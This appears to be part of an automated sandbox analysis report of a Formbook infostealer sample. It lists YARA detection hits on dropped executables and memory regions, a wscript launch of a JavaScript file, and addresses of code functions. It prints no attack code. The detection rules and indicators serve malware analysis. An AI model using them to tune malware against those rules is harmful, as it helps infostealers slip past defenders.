Source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\JmtwmJXhXe.js
Source: 2.2.bin.exe.b0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.bin.exe.b0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 40.0.5hol_r7nkdhp.exe.c50000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 40.0.5hol_r7nkdhp.exe.c50000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 40.0.5hol_r7nkdhp.exe.c50000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 40.0.5hol_r7nkdhp.exe.c50000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.bin.exe.b0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.bin.exe.b0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 40.0.5hol_r7nkdhp.exe.c50000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 40.0.5hol_r7nkdhp.exe.c50000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 40.0.5hol_r7nkdhp.exe.c50000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 40.0.5hol_r7nkdhp.exe.c50000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.272269605.000001E33FAF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.283279518.000001E33FDAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.283279518.000001E33FDAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.368626097.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.368626097.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.441172214.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.441172214.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.274118821.000001E33FAF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000012.00000002.817738228.0000000005407000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.817738228.0000000005407000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.787729752.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.787729752.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000028.00000000.781550005.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000028.00000000.781550005.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.273757086.000001E33FAF2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000002.00000000.283050957.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.283050957.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.806764391.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.806764391.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.272435860.000001E33FAF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000004.00000000.397676948.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.397676948.000000000DAD5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.273520622.000001E33FA71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.285664073.000001E33FAAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.285664073.000001E33FAAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.440060149.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.440060149.00000000000B1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000028.00000000.780941454.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000028.00000000.780941454.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.291278262.000001E33FAD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000028.00000000.780550493.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000028.00000000.780550493.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.787256308.000001A5460FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
Source: 00000000.00000003.286506040.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.271100464.000001E33FA55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000002.00000002.441024809.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.441024809.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.806738334.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.806738334.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.788499693.0000023E2EF22000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
Source: 00000000.00000003.283352541.000001E33FAAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.283352541.000001E33FAAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.293804379.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.283509737.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.272975523.000001E33FA54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.284654374.000001E33FB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.272013161.000001E33F9B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.284462821.000001E33FAAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.284462821.000001E33FAAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.806579092.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.806579092.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.273684731.000001E33FAEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.273404024.000001E33FAEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000028.00000000.781223568.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000028.00000000.781223568.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.298399545.000001E34090B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000002.298399545.000001E34090B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.298399545.000001E34090B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: wscript.exe PID: 6352, type: MEMORYSTR Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000B1030 2_2_000B1030
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CEA25 2_2_000CEA25
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000B9280 2_2_000B9280
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000BDC20 2_2_000BDC20
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000B2D90 2_2_000B2D90
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CE78A 2_2_000CE78A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CD792 2_2_000CD792
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000B2FB0 2_2_000B2FB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017FF900 2_2_017FF900
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01814120 2_2_01814120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0180B090 2_2_0180B090
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018220A0 2_2_018220A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018C20A8 2_2_018C20A8
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018C28EC 2_2_018C28EC
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018B1002 2_2_018B1002
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182EBB0 2_2_0182EBB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018BDBD2 2_2_018BDBD2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018C2B28 2_2_018C2B28
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018C22AE 2_2_018C22AE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F0B090 18_2_04F0B090
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1002 18_2_04FB1002
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC1D55 18_2_04FC1D55
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF0D20 18_2_04EF0D20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F14120 18_2_04F14120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFF900 18_2_04EFF900
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F16E30 18_2_04F16E30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2EBB0 18_2_04F2EBB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032EDC20 18_2_032EDC20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FEA25 18_2_032FEA25
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032E9280 18_2_032E9280
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032E2FB0 18_2_032E2FB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FE78A 18_2_032FE78A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FD792 18_2_032FD792
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032E2D90 18_2_032E2D90
